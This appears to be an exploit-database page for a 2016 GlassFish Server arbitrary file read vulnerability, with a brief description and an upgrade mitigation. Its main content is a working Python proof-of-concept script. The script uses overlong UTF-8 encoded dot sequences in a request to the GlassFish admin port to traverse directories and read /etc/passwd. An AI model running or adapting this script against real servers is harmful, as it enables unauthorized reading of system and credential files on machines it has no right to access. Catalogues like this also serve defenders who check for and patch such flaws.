header-logo
Suggest Exploit
vendor:
GlassFish Server
by:
bingbing
8,8
CVSS
HIGH
Arbitrary file read
22
CWE
Product Name: GlassFish Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: glassfish
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux x86
2016

glassfish Arbitrary file read vulnerability

GlassFish Server is vulnerable to an arbitrary file read vulnerability due to insufficient input validation. An attacker can exploit this vulnerability by sending a specially crafted request to the server. This can allow the attacker to read any file on the server.

Mitigation:

Upgrade to the latest version of GlassFish Server.
Source

Exploit-DB raw data:

# Title: glassfish Arbitrary file read vulnerability
# Date : 01/15/2016
# Author: bingbing
# Software link: https://glassfish.java.net/download.html
# Software: GlassFish Server
# Tested: Linux x86


#!/usr/bin/python
import urllib2
response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd')
s=response.read()
print s

Navigation

Suggest Exploit

Services By CQR